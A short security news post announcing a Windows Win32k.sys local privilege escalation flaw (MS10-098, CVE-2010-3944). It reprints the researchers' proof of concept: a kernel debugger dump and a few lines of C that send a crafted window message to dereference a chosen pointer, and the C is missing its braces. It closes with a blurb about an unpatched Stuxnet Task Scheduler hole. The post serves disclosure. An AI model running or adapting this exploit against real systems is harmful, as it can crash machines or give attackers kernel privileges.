January 19, 2017

Microsoft Windows Win32k.sys Local Privilege Escalation Vulnerability

Security researcher at SYSDREAM has discovered a local privilege-escalation vulnerability in Microsoft Windows that occurs in the ‘Win32k.sys’ Windows kernel-mode driver.

An attacker can exploit this vulnerability locally by executing arbitrary code with kernel-level privileges. With reference to SecurityFocus.com, the successful exploits will result in the complete compromise of affected computers and failed exploit attempts may cause a denial-of-service condition.

Exploit Code:

* MS10-098
* CVE-2010-3944
* Microsoft Windows Win32k pointer dereferencement
* --------------------
* Affected Software
* ------------------------
* Microsoft Windows 7 / 2008
* --------------------
* Consequences
* -----------------------
* An unprivileged user may be able to cause a bugcheck, or possibly execute
* arbitrary code by CSRSS.EXE.
* Credits : Stefan LE BERRE (s.leberre@sysdream.com)
*           Ludo t0ka7a
* WebSites : http://www.sysdream.com/
*            http://ghostsinthestack.org/
*            http://infond.blogspot.com/
*            http://twitter.com/hackinparis
* kd> r
* eax=00013370 ebx=0000000d ecx=00000000 edx=fea0069c esi=fea00618 edi=fea00618
* eip=8d72af90 esp=95b54a98 ebp=95b54b00 iopl=0         nv up ei ng nz na pe nc
* cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010286
* win32k!xxxRealDefWindowProc+0xf6:
* 8d72af90 c60000          mov     byte ptr [eax],0           ds:0023:00013370=??

#include <stdio.h>
#include <windows.h>
#include <Winuser.h>

int main(int argc, char *argv[])
    SendMessage((HWND) 16,(UINT) 13,0x80000000,0x00013370); // 0x13370 is the deref and 16 is the window handle of #32769
    return 0;

The vendor has released an advisory and updates:

Exploit released for unpatched Stuxnet hole

Microsoft has already patched three of the four security holes exploited by Stuxnet, but the fourth hole remains unpatched. Now, an exploit, currently being circulated on the web, exploits the remaining hole in the Windows Task Planner to access protected system directories – even if a user is only logged in with limited access privileges. Experts call this a privilege escalation attack.

Read the full story here.